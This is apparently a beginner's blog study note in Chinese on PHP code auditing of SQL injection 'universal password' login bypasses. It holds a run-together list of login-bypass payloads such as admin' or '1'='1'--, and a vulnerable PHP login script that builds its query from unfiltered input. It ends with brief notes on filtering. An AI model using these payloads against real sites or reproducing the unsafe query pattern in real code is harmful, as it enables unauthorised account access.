PHP代码审计入门-万能密码入门分析

0x00  写在前面

从零学习php，最终目的实现代码审计入门，软件采用sublime text，环境使用phpstudy搭建，数据库是navicat，需要有简单的html基础和php基础，跟随流沙前辈视频学习记录。

本章开始，正式进入代码审计的世界。让me看看曾经让我遥不可及的代码审计能不能慢慢啃下来。

同时，文章还是需要一丢丢些基础的，包括但不限于html、php、mysql和渗透知识。

0x01   代码审计-万能密码

sql三种注释

单行注释

        select user_name from users where user_id;--这时注释

        select user_name from users where user_id;-- 这时注释(要空格)

多行注释

        select user_name from users where user_id;

同时，注意注入和sql语法的异同，参考链接如下：

SQL注入中，注释#、 --+、 --%20、 %23到底是什么意思？sqli-labs-master_51CTO博客_sql注入注释

常用的测试万能密码，参考链接如下：

sql注入之万能密码总结 - 腾讯云开发者社区-腾讯云

真正测试的语句并没有这么多，而且现在存在万能密码的站点已经很少见仅作摘录' or 1='1'or'='or'adminadmin'--admin' or 4=4--admin' or '1'='1'--admin888"or "a"="aadmin' or 2=2#a' having 1=1#a' having 1=1--admin' or '2'='2')or('a'='aor 4=4--ca'or' 4=4--"or 4=4--'or'a'='a"or"="a'='a'or''=''or'='or'1 or '1'='1'=11 or '1'='1' or 4=4'OR 4=4%00"or 4=4%00'xoradmin' UNION Select 1,1,1 FROM admin Where ''='1-1%cf' union select 1,1,1 as password,1,1,1 %23117..admin' or 'a'='a 密码随便'or'='or''or 4=4//用户登录require "./lib/init.php";header("Content-type:text/html;charset=utf-8");if(empty($_POST)){    //header('Location: register.php');    echo "登录信息为空";    header("Refresh:3;url=login.php");}else{    if(isset($_POST["user_name"]) && isset($_POST["user_pass"])){      //接收数据，是否设置了user_name、user_pass        $usename = trim($_POST["user_name"]);       //trim用来去除字符串首尾的空格，此处假如用-- 来注释后有问题的        $password = trim($_POST["user_pass"]);      //对用户的输入也并没有做任何过滤        //接收username，user_pass        $password = md5($password);  //接收到password进行md5加密，所以如果密码进行aa' or 1#是没有用的，因为作了md5加密        $sql = "select * from users where user_name='$usename' and user_pass='$password'";                                $selectSQL = new MySql();    //实例化对象        $user_data = $selectSQL->getRow($sql);  //跟进getrow，看getrow代码逻辑                    if($user_data!="")        {            session_start();            $_SESSION["user"] = $user_data["user_name"];            header("Location: user.php");        }else{            echo "用户名或者密码错误!";            header("Refresh:3;url=login.php");        }    }else{        echo "登录信息不完整";        header("Refresh:3;url=login.php");    }}

为更好理解代码，跟进到getrow，看getrow代码逻辑，发现getrow仅用来返回sql语句

跟进到link，link仅作为数据库连接作用

因万能密码也是较为简单，基本审计思路已经完成。

0x02  防御手段

常用手段是对于用户输入的字符串进行严格过滤，这里代码仅使用了addslashes()用于过滤，其实该函数也是存在绕过风险的，但我们的目的是学习，馒头一口一口吃。

夜已深，今日先到此为止吧。如有错误，欢迎指正。

来源地址：https://blog.csdn.net/m0_60988110/article/details/127199943